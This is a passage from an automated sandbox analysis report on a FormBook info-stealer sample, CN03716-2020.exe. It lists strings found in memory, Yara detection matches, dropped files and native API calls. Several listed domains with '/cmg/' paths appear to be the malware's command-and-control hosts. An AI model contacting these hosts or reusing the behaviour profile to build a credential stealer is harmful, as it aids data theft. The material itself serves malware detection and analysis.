            Source: CN03716-2020.exe, 00000000.00000003.225219972.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.225207756.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: CN03716-2020.exe, 00000000.00000003.226849837.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmls
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: CN03716-2020.exe, 00000000.00000003.225682660.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersP
            Source: CN03716-2020.exe, 00000000.00000003.228016814.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersRl
            Source: CN03716-2020.exe, 00000000.00000003.225727936.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersers
            Source: CN03716-2020.exe, 00000000.00000003.225727936.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersil
            Source: CN03716-2020.exe, 00000000.00000003.227777910.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersr
            Source: CN03716-2020.exe, 00000000.00000003.225241955.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerssl
            Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/n-
            Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=-
            Source: CN03716-2020.exe, 00000000.00000003.227571067.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFY-
            Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comK-
            Source: CN03716-2020.exe, 00000000.00000003.226480549.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
            Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals=-
            Source: CN03716-2020.exe, 00000000.00000003.225219972.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comce/
            Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcom
            Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
            Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdmo2-
            Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdsed
            Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
            Source: CN03716-2020.exe, 00000000.00000003.227571067.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitud
            Source: CN03716-2020.exe, 00000000.00000003.225219972.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
            Source: CN03716-2020.exe, 00000000.00000003.225307436.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comld
            Source: CN03716-2020.exe, 00000000.00000003.227933811.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlic
            Source: CN03716-2020.exe, 00000000.00000003.245028956.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.commamY-
            Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc.
            Source: CN03716-2020.exe, 00000000.00000003.227933811.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.245028956.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
            Source: CN03716-2020.exe, 00000000.00000003.225307436.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como2-
            Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comu-
            Source: CN03716-2020.exe, 00000000.00000003.225989420.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueed/-
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: CN03716-2020.exe, 00000000.00000003.221025180.000000000578B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comca6pE
            Source: CN03716-2020.exe, 00000000.00000003.222335191.000000000577C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: CN03716-2020.exe, 00000000.00000003.223229397.000000000577C000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn$&
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: CN03716-2020.exe, 00000000.00000003.222318465.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn0ED
            Source: CN03716-2020.exe, 00000000.00000003.222687558.0000000005786000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnb-
            Source: CN03716-2020.exe, 00000000.00000003.229294794.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.229079780.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: CN03716-2020.exe, 00000000.00000003.229859739.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.229294794.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.com/cmg/www.shizukis2.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.com/cmg/www.iaimorganic.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.comReferer:
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.223755861.0000000005773000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
            Source: CN03716-2020.exe, 00000000.00000003.223755861.0000000005773000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/It
            Source: CN03716-2020.exe, 00000000.00000003.223920718.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/g-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.223920718.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Y-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ko
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-
            Source: CN03716-2020.exe, 00000000.00000003.223920718.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o-
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyz
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyz/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyz/cmg/www.manderley-condos.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyzReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.net
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.net/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.net/cmg/www.8936199.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.netReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.com/cmg/www.rootforequality.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.northminute.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.northminute.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.northminute.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.com/cmg/www.xexpressx.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.493362754.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.493362754.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.com/cmg/www.caneryis.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.comReferer:
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: CN03716-2020.exe, 00000000.00000003.224151658.00000000057AE000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comX
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.com/cmg/www.dropofluxe.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.comReferer:
            Source: explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: CN03716-2020.exe, 00000000.00000003.221290771.000000000578B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: CN03716-2020.exe, 00000000.00000003.225078344.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
            Source: CN03716-2020.exe, 00000000.00000003.225109607.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de.
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: CN03716-2020.exe, 00000000.00000003.225109607.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dec
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.com/cmg/www.yumnamccann.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.com/cmg/www.1089konstanzter.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.comReferer:
            Source: CN03716-2020.exe, 00000000.00000003.223313528.0000000005788000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: NETSTAT.EXE, 0000000F.00000002.488134032.00000000008F2000.00000004.00000020.sdmpString found in binary or memory: https://login.live.ch
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmp, NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000F.00000003.392154725.00000000008E0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: NETSTAT.EXE, 0000000F.00000002.486291049.0000000000398000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033FcA
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033=
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmp, NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Detected FormBook malwareShow sources
            Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logri.iniJump to dropped file
            Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logrv.iniJump to dropped file
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419CA0 NtCreateFile,3_2_00419CA0
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419D50 NtReadFile,3_2_00419D50
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419DD0 NtClose,3_2_00419DD0
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419E80 NtAllocateVirtualMemory,3_2_00419E80
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419C5A NtCreateFile,3_2_00419C5A
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419CF2 NtCreateFile,3_2_00419CF2
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419C9A NtCreateFile,3_2_00419C9A
            Source: C:\Users\user\Desktop\CN03716-2020.exeCode function: 3_2_00419E7A NtAllocateVirtualMemory,3_2_00419E7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9840 NtDelayExecution,LdrInitializeThunk,15_2_00DC9840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_00DC9860
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC95D0 NtClose,LdrInitializeThunk,15_2_00DC95D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC99A0 NtCreateSection,LdrInitializeThunk,15_2_00DC99A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9540 NtReadFile,LdrInitializeThunk,15_2_00DC9540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9560 NtWriteFile,LdrInitializeThunk,15_2_00DC9560
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_00DC9910
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC96D0 NtCreateKey,LdrInitializeThunk,15_2_00DC96D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_00DC96E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9650 NtQueryValueKey,LdrInitializeThunk,15_2_00DC9650
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9A50 NtCreateFile,LdrInitializeThunk,15_2_00DC9A50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_00DC9660
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9610 NtEnumerateValueKey,LdrInitializeThunk,15_2_00DC9610
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9FE0 NtCreateMutant,LdrInitializeThunk,15_2_00DC9FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9780 NtMapViewOfSection,LdrInitializeThunk,15_2_00DC9780
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9770 NtSetInformationFile,LdrInitializeThunk,15_2_00DC9770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9710 NtQueryInformationToken,LdrInitializeThunk,15_2_00DC9710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC9B00 NtSetValueKey,LdrInitializeThunk,15_2_00DC9B00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC98F0 NtReadVirtualMemory,15_2_00DC98F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00DC98A0 NtWriteVirtualMemory,15_2_00DC98A0
